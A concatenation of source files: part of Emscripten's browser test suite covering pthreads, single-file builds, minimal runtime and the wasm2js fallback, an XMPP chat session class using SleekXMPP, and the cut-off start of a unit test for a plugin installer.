def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = 'src.c'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
self.compile_btest(['src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE=1'])
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE=1'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME=1', '-s', 'SINGLE_FILE=1', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE=1', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = ['src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
create_test_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
create_test_file('page.c', self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
self.compile_btest(['page.c', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([PYTHON, FILE_PACKAGER, 'data.js', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest(['page.c', '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
self.compile_btest(['test.c', '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind'] + self.get_async_args())
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME=1'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE=1'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE=1']]:
for modularize in [[], ['-s', 'MODULARIZE=1']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION=1', '--closure', '1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION=1', '--closure', '1']]:
self.btest(path_from_root('tests', 'small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME=1'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME=1'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'small_hello_world.c')).read()))
self.compile_btest([src, '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'small_hello_world.c')).read()))
self.compile_btest([src, '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(path_from_root('tests', 'system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB.cpp', js_engines=[V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_2GB_fail.cpp', js_engines=[V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB_fail.cpp', js_engines=[V8_ENGINE])
@unittest.skip("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS=1', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
|
xmpp.py
|
import datetime
import logging
import threading
import tzlocal
# See:
# * http://sleekxmpp.com/getting_started/muc.html
# * http://sleekxmpp.com/getting_started/echobot.html
# * https://github.com/fritzy/SleekXMPP/wiki/Stanzas:-Message
from sleekxmpp import ClientXMPP
from chatty.exceptions import OperationNotSupported
from chatty.sessions.interface import Session
from chatty.signals.interface import Signal
from chatty.signals.message import Message
from chatty.signals.metadata import SignalMetaData
from chatty.signals.status_change import StatusChange
from chatty.types import LoginConfig, Handle, SignalID, StatusTypes, PresenceStatusValues, TypingStatusValues
LOGGER = logging.getLogger(__name__)
class XMPPSession(Session):
"""
An XMPP chat session interface.
"""
def __init__(self, connection_info: LoginConfig, xmpp_client: ClientXMPP = None,
starting: datetime.datetime = None):
super().__init__()
if xmpp_client is None:
xmpp_client = make_xmpp_client(connection_info)
self._xmpp_client = xmpp_client
self._xmpp_connection_info = connection_info
self._starting = datetime.datetime.now(tzlocal.get_localzone()) if starting is None else starting
# Register callbacks for incoming messages
self._xmpp_client.add_event_handler("session_start", self.on_session_started)
self._xmpp_client.add_event_handler("message", self.on_message)
self._xmpp_client.add_event_handler("groupchat_message", self.on_group_chat_message)
self._xmpp_client.add_event_handler("failed_auth", self.on_failed_authentication)
self._xmpp_client.add_event_handler("error", self.on_error)
# See https://xmpp.org/extensions/xep-0085.html#definitions
self._xmpp_client.add_event_handler("chatstate_active", self.on_chatstate_active)
self._xmpp_client.add_event_handler("chatstate_composing", self.on_chatstate_composing)
self._xmpp_client.add_event_handler("chatstate_gone", self.on_chatstate_gone)
self._xmpp_client.add_event_handler("chatstate_inactive", self.on_chatstate_inactive)
self._xmpp_client.add_event_handler("chatstate_paused", self.on_chatstate_paused)
self._main_thread = threading.current_thread()
self._thread_error = None
self._alive = True
self._process_thread = threading.Thread(target=self._process_main, daemon=True)
self._process_thread.start()
self._check_for_thread_errors()
def _check_for_thread_errors(self):
if self._thread_error and threading.current_thread() == self._main_thread:
thread_error, self._thread_error = self._thread_error, None
raise thread_error
def _notify_thread_error(self, exc: Exception):
LOGGER.exception("Error in thread: %s" % exc)
self._thread_error = exc
def close(self):
if hasattr(self, '_xmpp_client'):
self._xmpp_client.disconnect()
self._alive = False
self._process_thread.join()
self._check_for_thread_errors()
def join(self, timeout=None):
self._process_thread.join(timeout)
def send(self, signal: Signal) -> None:
# TODO: Handle outbound presence & typing status changes.
if not isinstance(signal, Message):
raise TypeError(signal)
assert isinstance(signal, Message)
origin = signal.meta_data.origin
if signal.meta_data.visible_to:
raise OperationNotSupported("XMPP protocol does not support carbon-copying.")
if signal.meta_data.room:
self._xmpp_client.send_message(
mfrom=origin,
mto=signal.meta_data.room,
mbody=str(signal.content),
mtype='groupchat'
)
for recipient in signal.meta_data.addressees:
self._xmpp_client.send_message(
mfrom=origin,
mto=recipient,
mbody=str(signal.content),
mtype='chat'
)
self._check_for_thread_errors()
# noinspection PyUnusedLocal
def on_session_started(self, event):
try:
LOGGER.info("Successfully connected and authenticated.")
self._xmpp_client.get_roster()
self._xmpp_client.send_presence()
except Exception as exc:
LOGGER.exception("Error in on_session_started()")
self._notify_thread_error(exc)
@staticmethod
def _get_meta_data(event):
origin = Handle(event['from'].bare)
visible_to = [origin]
if event.get('to', None):
addressees = [Handle(event['to'].bare)]
visible_to.extend(addressees)
else:
addressees = None
if event.get('room', None):
room = Handle(event['room'].bare)
# TODO: Add everyone in the room to visible_to
else:
room = None
return SignalMetaData(
identifier=SignalID(event['id']),
origin=origin,
addressees=addressees,
visible_to=visible_to,
response_to=None,
sent_at=None,
received_at=datetime.datetime.now(),
room=room
)
def on_message(self, message):
try:
LOGGER.info("Message received.")
# Only handle regular chat messages
if message['type'] not in ('chat', 'normal'):
LOGGER.debug("Ignoring non-chat message.")
return
meta_data = self._get_meta_data(message)
message = Message(meta_data, message['body'])
self.receive(message)
except Exception as exc:
LOGGER.exception("Error in on_message()")
self._notify_thread_error(exc)
def on_group_chat_message(self, message):
try:
LOGGER.info("Group-chat message received.")
# Only handle group chat messages
if message['type'] != 'groupchat':
LOGGER.debug("Ignoring non-groupchat message.")
return
meta_data = self._get_meta_data(message)
message = Message(meta_data, message['body'])
self.receive(message)
except Exception as exc:
LOGGER.exception("Error in on_group_chat_message()")
self._notify_thread_error(exc)
# noinspection PyUnusedLocal
def on_failed_authentication(self, event):
try:
LOGGER.critical("Authentication failed.")
self.close()
except Exception as exc:
LOGGER.exception("Error in on_failed_authentication()")
self._notify_thread_error(exc)
# noinspection PyMethodMayBeStatic
def on_error(self, event):
LOGGER.error("XMPP error event: %s" % event)
def on_chatstate_active(self, event):
try:
LOGGER.info("Presence=present message received.")
meta_data = self._get_meta_data(event)
signal = StatusChange(meta_data, StatusTypes.PRESENCE, PresenceStatusValues.PRESENT)
self.receive(signal)
except Exception as exc:
LOGGER.exception("Error in on_chatstate_active()")
self._notify_thread_error(exc)
def on_chatstate_inactive(self, event):
try:
LOGGER.info("Presence=inactive message received.")
meta_data = self._get_meta_data(event)
signal = StatusChange(meta_data, StatusTypes.PRESENCE, PresenceStatusValues.INACTIVE)
self.receive(signal)
except Exception as exc:
LOGGER.exception("Error in on_chatstate_inactive()")
self._notify_thread_error(exc)
def on_chatstate_gone(self, event):
try:
LOGGER.info("Presence=away message received.")
meta_data = self._get_meta_data(event)
signal = StatusChange(meta_data, StatusTypes.PRESENCE, PresenceStatusValues.AWAY)
self.receive(signal)
except Exception as exc:
LOGGER.exception("Error in on_chatstate_gone()")
self._notify_thread_error(exc)
def on_chatstate_composing(self, event):
try:
LOGGER.info("Typing=started message received.")
meta_data = self._get_meta_data(event)
signal = StatusChange(meta_data, StatusTypes.TYPING, TypingStatusValues.STARTED)
self.receive(signal)
except Exception as exc:
LOGGER.exception("Error in on_chatstate_composing()")
self._notify_thread_error(exc)
def on_chatstate_paused(self, event):
try:
LOGGER.info("Typing=stopped message received.")
meta_data = self._get_meta_data(event)
signal = StatusChange(meta_data, StatusTypes.TYPING, TypingStatusValues.STOPPED)
self.receive(signal)
except Exception as exc:
LOGGER.exception("Error in on_chatstate_paused()")
self._notify_thread_error(exc)
def _process_main(self):
while self._alive:
try:
# Connect to the XMPP server and start processing XMPP stanzas.
if self._xmpp_client.connect((self._xmpp_connection_info.host, self._xmpp_connection_info.port)):
self._xmpp_client.process(block=True)
else:
raise ConnectionError()
except Exception as exc:
LOGGER.exception("Error in xmpp client.")
self._thread_error = exc
def make_xmpp_client(connection_info: LoginConfig):
client = ClientXMPP('%s@%s' % (connection_info.user, connection_info.host), connection_info.password)
client.use_signals()
# TODO: Make sure all events are handled, and check if we should support other XEPs.
client.register_plugin('xep_0030') # Service Discovery
client.register_plugin('xep_0045') # Multi-User Chat
client.register_plugin('xep_0085') # Chat State Notifications
client.register_plugin('xep_0199') # XMPP Ping
# TODO: Use XEP 0079 to add delivery failure notifications once the sleekxmpp plugin for this XEP is released.
# client.register_plugin('xep_0079') # Advanced Message Processing
return client
|
test_podmodel_installer.py
|
"""test_podmodel_installer.py - tests the podmodel_installer module
Chris R. Coughlin (TRI/Austin, Inc.)
"""
__author__ = 'Chris R. Coughlin'
from controllers import pathfinder
from models.tests import test_plugin_installer
import models.podmodel_installer as podmodel_installer
import models.zipper as zipper
import cStringIO
import unittest
import os
import random
import string
import threading
class TestPODModelInstaller(test_plugin_installer.TestPluginInstaller):
"""Tests the PODModelInstaller class"""
def setUp(self):
self.good_plugin_installer = podmodel_installer.PODModelInstaller(self.good_plugin_loc)
self.plugin_reader = zipper.UnZipper(self.good_plugin_loc)
@property
def good_plugin_loc(self):
"""Returns the full path to the known good plugin archive."""
return test_plugin_installer.TestPluginInstaller.local_plugin('good_podmodel.zip')
@property
def badfolders_plugin_loc(self):
"""Returns the full path to a known bad plugin (support folders must
share name of the plugin archive)"""
return test_plugin_installer.TestPluginInstaller.local_plugin('badfolders_podmodel.zip')
@property
def badname_plugin_loc(self):
"""Returns the full path to a known bad plugin (root plugin module
